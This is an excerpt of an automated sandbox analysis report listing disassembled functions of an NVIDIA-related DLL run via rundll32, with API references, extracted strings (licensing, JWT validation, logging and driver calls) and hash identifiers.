                                                                    • Instruction Fuzzy Hash: 9E326E32A16B81A9E710EF61E8401ED33B4FB457C8F801536DA5D57BAAEF38D218C754
                                                                    Function 00007FF8A8CFDA48 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 155processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: BlockCloseCreateEnvironmentErrorHandleLast$BackslashDestroyDirectoryPathProcessSystemUserswprintf
                                                                    • String ID: %srundll32.exe %s%s,nvsvcErrorReport %d$NVSVC64.DLL$WinSta0\Default
                                                                    • API String ID: 1123984594-3221355949
                                                                    • Opcode ID: 0519f0aa9fe9a1010cbe42dd1a385e2634014eeb4eb6fbf3ed9bb9b2cf37a51d
                                                                    • Instruction ID: ad5bd506fddc2d1c491aa1cf2a0439aa142c5e31fcf381094be319f572d467eb
                                                                    • Opcode Fuzzy Hash: 0519f0aa9fe9a1010cbe42dd1a385e2634014eeb4eb6fbf3ed9bb9b2cf37a51d
                                                                    • Instruction Fuzzy Hash: 5A618C32A0AB42A5FB51AF61E8402BE77A0FB857C4F400035DE5E43A95DF7CE955CB28
                                                                    Function 00007FF8A8D179F8 Relevance: 25.3, APIs: 12, Strings: 2, Instructions: 783COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_$_invalid_parameter_noinfo_noreturn$Ios_base_dtorstd::ios_base::_
                                                                    • String ID: %H:%M$%H:%M:%S
                                                                    • API String ID: 1010869509-4074728551
                                                                    • Opcode ID: c9f013a2d77fcdbbbf855816d4a4bb38bbc75fe1b0b9f63c418a03429bee551e
                                                                    • Instruction ID: 29d4610e9f9a641439f210ecf01552b052326f93718ef33f1124096cacbee89d
                                                                    • Opcode Fuzzy Hash: c9f013a2d77fcdbbbf855816d4a4bb38bbc75fe1b0b9f63c418a03429bee551e
                                                                    • Instruction Fuzzy Hash: 2F72C722A1AAC6A5EB20DF35D8403ED6361FF457D8F805231EA6D17AE9DF38D648C314
                                                                    Function 00007FF8A8CFC878 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 202libraryloadermemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,00007FF8A8CFBBB5), ref: 00007FF8A8CFC8DD
                                                                    • GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,00007FF8A8CFBBB5), ref: 00007FF8A8CFC90D
                                                                    • GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,00007FF8A8CFBBB5), ref: 00007FF8A8CFC93D
                                                                    • GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,00007FF8A8CFBBB5), ref: 00007FF8A8CFC96D
                                                                    • GetProcAddress.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,00007FF8A8CFBBB5), ref: 00007FF8A8CFC99D
                                                                      • Part of subcall function 00007FF8A8CFAB70: VerSetConditionMask.KERNEL32 ref: 00007FF8A8CFABB0
                                                                      • Part of subcall function 00007FF8A8CFAB70: VerifyVersionInfoW.KERNEL32 ref: 00007FF8A8CFABDE
                                                                    • LocalAlloc.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF8A8CFBBB5), ref: 00007FF8A8CFCA66
                                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,00000000,?,00007FF8A8CFBBB5), ref: 00007FF8A8CFCB25
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Local$AllocConditionFreeInfoMaskVerifyVersion
                                                                    • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInfo$SetupDiGetClassDevsW$SetupDiGetDeviceInterfaceDetailW$SetupDiGetDeviceRegistryPropertyW$Setupapi.dll
                                                                    • API String ID: 576420853-2811369298
                                                                    • Opcode ID: 54efa2f6256b3a210f47ed37694e6d5c69e2a3bfbd89194f0be96b3c32897933
                                                                    • Instruction ID: b95df4e612608533fd4db0b071a18f2262670f9f2736338c7101960aff0cef4e
                                                                    • Opcode Fuzzy Hash: 54efa2f6256b3a210f47ed37694e6d5c69e2a3bfbd89194f0be96b3c32897933
                                                                    • Instruction Fuzzy Hash: E0817F35B0BB12E2FB54DB16A84057562A1FF98BD0F488039CD4D437A0EF7DE9658728
                                                                    Function 00007FF8A8D68920 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 292memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Heapswprintf$FreeInit_thread_footerMutexOpenProcess_invalid_parameter_noinfo_noreturn
                                                                    • String ID: Global\GridLicenseUtilMutex-D2FCF701-B1AC-4158-B070-B5944D631573$GridCloudLicenseStateMachine.cpp$GridCloudLicenseStateMachine::GridCloudLicenseStateMachine$InitGridCloudLicenseStateMachine$Mutex init failed : %s$NvXDCore.cpp$Starting cloud license state machine in unlicensed state
                                                                    • API String ID: 2775131440-2565526366
                                                                    • Opcode ID: 7fbcd51417c2ce944dd4776cb225de7be85ad73448ec72368c4d622f86bfed91
                                                                    • Instruction ID: fd256d29dd2a220bc12ef604a753cb9bf22caca1922b5d7fc236c7284388e030
                                                                    • Opcode Fuzzy Hash: 7fbcd51417c2ce944dd4776cb225de7be85ad73448ec72368c4d622f86bfed91
                                                                    • Instruction Fuzzy Hash: 9BE18E32A0AB81AAE754DF35E8403ED77A4FB49388F404235EA9C57B55EF38E168C714
                                                                    Function 00007FF8A8D2C180 Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 413registrycomCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Close$InfoQuery$AddressCreateFromHandleInstanceModuleProcString
                                                                    • String ID: CLSID\$\Implemented Categories$\Required Categories
                                                                    • API String ID: 2927819212-4092563799
                                                                    • Opcode ID: 8854d937e459bdcea6ecb079211e8498e5b1a390fea664733db5c66b64342e8a
                                                                    • Instruction ID: 2825892968a71067a6de45149e0120fcc58e3eed4a8cdd06a58ac43b701ef0e5
                                                                    • Opcode Fuzzy Hash: 8854d937e459bdcea6ecb079211e8498e5b1a390fea664733db5c66b64342e8a
                                                                    • Instruction Fuzzy Hash: 9F02D535A0A746A1FB64DB65E4402BD23A1FF447C4F140136DB5D47AA8EF3CE858CB29
                                                                    Function 00007FF8A8D75780 Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 371COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Init_thread_footerswprintf
                                                                    • String ID: Failed to allocate memory$Failed to decode signature from token received$Failed to process JWT token$Failed to validate client configuration token$GridCommonUtils.cpp$verifySignature
                                                                    • API String ID: 732731317-307524478
                                                                    • Opcode ID: 60f0a91414a4c17a35b2dc9e685243dc3246e9d4e4b541b4ace639f51f741c86
                                                                    • Instruction ID: 03ae25d7654281f47eda812a8dfdeb73205fe788430bde343f895c7acd88e9ef
                                                                    • Opcode Fuzzy Hash: 60f0a91414a4c17a35b2dc9e685243dc3246e9d4e4b541b4ace639f51f741c86
                                                                    • Instruction Fuzzy Hash: 84025132A0AB82A5FB20DB65E4406ED77B4FB85388F800135DA5D57B99EF3CE119CB14
                                                                    Function 00007FF8A8D737C0 Relevance: 16.1, APIs: 3, Strings: 6, Instructions: 336COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: swprintf$Init_thread_footer
                                                                    • String ID: "service_instance_public_key_pem":"$Could not fetch value for service instance public key$Failed to decode payload$Failed to process JWT token$GridCommonUtils.cpp$getPublicKey
                                                                    • API String ID: 2214013052-3729035618
                                                                    • Opcode ID: 7e758ee033a478cd587704f63f01072de100f83d3495ce6fd29ae4bce839deb4
                                                                    • Instruction ID: 6c7370bb5e03b2ec43459ed03fe4211260f651bb840326f10e3e75e88933582e
                                                                    • Opcode Fuzzy Hash: 7e758ee033a478cd587704f63f01072de100f83d3495ce6fd29ae4bce839deb4
                                                                    • Instruction Fuzzy Hash: 47E17D32A1AB92A9FB149B64E8403ED77A4FB453C8F840136DA5D53B99EF3CD109C724
                                                                    Function 00007FF8A8D56B7C Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 138fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: CloseControlCreateDeviceFileHandleInit_thread_footer
                                                                    • String ID: 9$Failed to open NvPciFilter driver interface$NVIDIA_NVPCIFLT_IOCTL_POWERUP_GPU failed$PowerOnDGpu$ZeroPowerOnBootUtil.cpp$\\.\nvpciflt
                                                                    • API String ID: 4084529720-463136028
                                                                    • Opcode ID: bbb467a6571d8433b9d5e4c1975cbd9dc0dba2bcc6484821e55f6f00760f6908
                                                                    • Instruction ID: 5aae491dc1ed41b02a01f7d8122d7b57f0b44d6e58a310e3ede4e08e0233ab88
                                                                    • Opcode Fuzzy Hash: bbb467a6571d8433b9d5e4c1975cbd9dc0dba2bcc6484821e55f6f00760f6908
                                                                    • Instruction Fuzzy Hash: B5611F72A0AB01E9E711DFA0E4501ED33B4FB45398F801636EA5D17BA9EF38D219C758
                                                                    Function 00007FF8A8D72200 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 299COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: swprintf$Init_thread_footer
                                                                    • String ID: Base64 target buffer too small$GridCommonUtils.cpp$Invalid base64 char conversion %c$Invalid state in base64$base64Decode
                                                                    • API String ID: 2214013052-3687260524
                                                                    • Opcode ID: 06f17cfdf99209c0d11bf88da801afd0ece1d720c5b23629c5c04ba441876928
                                                                    • Instruction ID: 0e5c68f231f6e27a7027b4563e4185d59a0f588b95de3da576b2f04b19fb9c75
                                                                    • Opcode Fuzzy Hash: 06f17cfdf99209c0d11bf88da801afd0ece1d720c5b23629c5c04ba441876928
                                                                    • Instruction Fuzzy Hash: 2AD19532A0AB82A9F710CB64E4403ED77A4FB45394F90013AD69E07BA5EF3CE559CB14
                                                                    Function 00007FF8A8DE4A20 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 329timeCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                                    • String ID: ?
                                                                    • API String ID: 435049134-1684325040
                                                                    • Opcode ID: 3ba54a54f64e311380a596a5b8c13d47f214089bdc2c0bf900aca5c65f45a280
                                                                    • Instruction ID: c18b5499501c0044e9b05a70d309f9befe88a67c64098191d4a607ecb9ff2cca
                                                                    • Opcode Fuzzy Hash: 3ba54a54f64e311380a596a5b8c13d47f214089bdc2c0bf900aca5c65f45a280
                                                                    • Instruction Fuzzy Hash: C0D1F632A0AA46AFE7509F21D8402B93F96FF447D8F444131EA6D47696EF3CE845C728
                                                                    Function 00007FF8A8D069A0 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 246COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00007FF8A8D0EA24: std::_Deallocate.LIBCONCRT ref: 00007FF8A8D0EA6E
                                                                      • Part of subcall function 00007FF8A8D060EC: std::current_exception.LIBCMT ref: 00007FF8A8D06119
                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00007FF8A8D06D16
                                                                      • Part of subcall function 00007FF8A8D9CA10: std::ios_base::_Tidy.LIBCPMT ref: 00007FF8A8D9CA35
                                                                      • Part of subcall function 00007FF8A8D0E0A4: std::_Deallocate.LIBCONCRT ref: 00007FF8A8D0E0FC
                                                                      • Part of subcall function 00007FF8A8D0E194: std::_Deallocate.LIBCONCRT ref: 00007FF8A8D0E1F0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: Deallocatestd::_$std::ios_base::_$Ios_base_dtorTidystd::current_exception
                                                                    • String ID: file$function$line$msg$origin$timestamp
                                                                    • API String ID: 3875769080-4102175642
                                                                    • Opcode ID: 461f2c2ad81ed990861590079a5a549b510804d5c2a481b745797e54b5d529a6
                                                                    • Instruction ID: a4ac5d2690f534e228157751a62fd11899c5d64c8a06888c2d3c4aadd8f8ab58
                                                                    • Opcode Fuzzy Hash: 461f2c2ad81ed990861590079a5a549b510804d5c2a481b745797e54b5d529a6
                                                                    • Instruction Fuzzy Hash: 35B18132626A92AADB10EF25EC515ED3360FF413D8F802131FA2E43A99DF39D558C358
                                                                    Function 00007FF8A8D070EC Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 189registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4538096939.00007FF8A8CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8A8CF0000, based on PE: true
                                                                    • Associated: 00000003.00000002.4538037574.00007FF8A8CF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538390729.00007FF8A8E21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538576796.00007FF8A8E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538663993.00007FF8A8EA2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538723630.00007FF8A8EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538794066.00007FF8A8EE3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538892968.00007FF8A8EE8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4538973313.00007FF8A8EED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.4539028330.00007FF8A8EFD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_7ff8a8cf0000_rundll32.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue$CloseCreateDeallocateFileHandlestd::_
                                                                    • String ID: AppendProcessNameToPathPrefix$MaxFileCount$MaxFileSize$PathPrefix$WriteThrough
